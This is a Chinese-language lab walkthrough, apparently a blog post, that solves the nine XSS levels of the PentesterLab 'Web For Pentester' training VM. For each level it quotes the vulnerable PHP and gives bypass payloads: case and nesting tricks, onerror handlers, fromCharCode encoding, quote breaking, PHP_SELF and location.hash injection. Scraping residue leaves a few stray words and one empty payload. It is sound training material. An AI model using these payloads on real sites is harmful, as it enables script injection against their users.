Web For Pentester靶場(xss部分)

配置

官網:https://pentesterlab.com/
下載地址:https://isos.pentesterlab.com/web_for_pentester_i386.iso
安裝方法:虛擬機按照,該靶場是封裝在debian系統裏,安裝完成打開,ifconfig查看ip地址:

而後直接訪問ip便可
web for pentester默認沒有root密碼,能夠來設置密碼,方便ssh鏈接等查看源碼php

sudo passwd

第一關

查看源碼:

<?php
        echo $_GET["name"];
?>

分析:

沒有任何的過濾,直接將get獲取的打印html

payload:

/xss/example1.php?name=
git

第二關

查看源碼:

<?php
        $name =  $_GET["name"];
        $name = preg_replace("/<script>/","", $name);
        $name = preg_replace("/<\/script>/","", $name);
echo $name;
?>

分析:

這裏經過preg_replace()函數來正則,可是這種匹配是有缺陷的,沒有匹配大小寫,能夠經過大小寫繞過
github

payload:

/xss/example2.php?name=<Script>alert('xss')</Script>

第三關

查看源碼:

<?php
        $name =  $_GET["name"];
        $name = preg_replace("/<script>/i","", $name);
        $name = preg_replace("/<\/script>/i","", $name);
echo $name;
?>

分析:

在第二關的基礎上加了/i,使之匹配不區分大小寫,preg_replace()函數將匹配到的,替換成空格,可是隻匹配了一次,相似sql注入(Seselectlect),能夠嵌套<script>,匹配到了,替換成空格變成咱們想要的了web

payload:

/xss/example3.php?name=<sc<script>ript>alert('xss')</sc</script>ript>

第四關

查看源碼:

<?php require_once '../header.php';
if (preg_match('/script/i', $_GET["name"])) {
  die("error");
}
?>
Hello <?php  echo $_GET["name"]; ?>

分析:

對script進行了不區分大小寫,匹配若是匹配到,就執行die("error"),終止程序,因此scirpt不能用,只能經過其餘標籤來觸發js事件,可以使用onerror事件,來執行js

sql

payload:

/xss/example4.php?name=<img src="xss" onerror=alert('xss')>

第五關

查看源碼:

<?php require_once '../header.php';
if (preg_match('/alert/i', $_GET["name"])) {
  die("error");
}
?>
Hello <?php  echo $_GET["name"]; ?>

分析:

對alert進行了過濾瀏覽器

一.可使用相似alert的方法來彈窗好比confirm,prompt


二.經過編碼繞過,String.fromCharCode()編碼來繞過,可使用hackbar來快速編碼




ssh

payload:

/xss/example5.php?name=<script>confirm('xss')</script>
/xss/example5.php?name=<script>prompt('xss')</script>
/xss/example5.php?name=<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 39, 120, 115, 115, 39, 41))</script>



第六關

查看源碼:

<script>
        var $a= "<?php  echo $_GET["name"]; ?>";
</script>

分析:

經過get的方式傳入name變量,輸入賦值給全局變量a,能夠經過閉合雙引號或者註釋雙引號來增長咱們的js代碼xss

payload:

/xss/example6.php?name=";alert('xss');"
/xss/example6.php?name=";alert('xss');//




第七關

查看源碼:

<script>
        var $a= '<?php  echo htmlentities($_GET["name"]); ?>';
</script>

分析:

和第八關類似htmlentities()會把字符轉換爲HTML實體,會將雙引號進行編碼,但不編碼單引號,這裏使用的是單引好因此能夠繼續包含和註釋函數

payload:

/xss/example7.php?name=';alert('xss');'
/xss/example7.php?name=';alert('xss');//




第八關

查看源碼:

<?php
  require_once '../header.php';
if (isset($_POST["name"])) {
    echo "HELLO ".htmlentities($_POST["name"]);
  }
?>
<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="POST">
Your name:<input type="text" name="name" />
<input type="submit" name="submit"/>

分析:

name變量經過form表單以post方式傳入,而後經過htmlentities函數實體化後輸出來,並未找到破解的方法。而後觀察

,用戶可控制參數PHP_SELF,而且沒有閉合引號和標籤

payload:

/xss/example8.php/"><script>alert('XSS')</script>//
/xss/example8.php/" onclick=alert('XSS')//



第九關

查看源碼:

<script>
  document.write(location.hash.substring(1));
</script>

分析:

location.hash屬性

payload:

/xss/example9.php#<script>alert('XSS')</script>

注意:在火狐和Chrome瀏覽器<>會被自動轉碼

參考文章

https://www.sqlsec.com/2020/05/pentesterlab.html
https://blog.csdn.net/qq_20307987/article/details/51284169
歡迎訪問個人我的博客:https://lmg66.github.io/

相關文章
相關標籤/搜索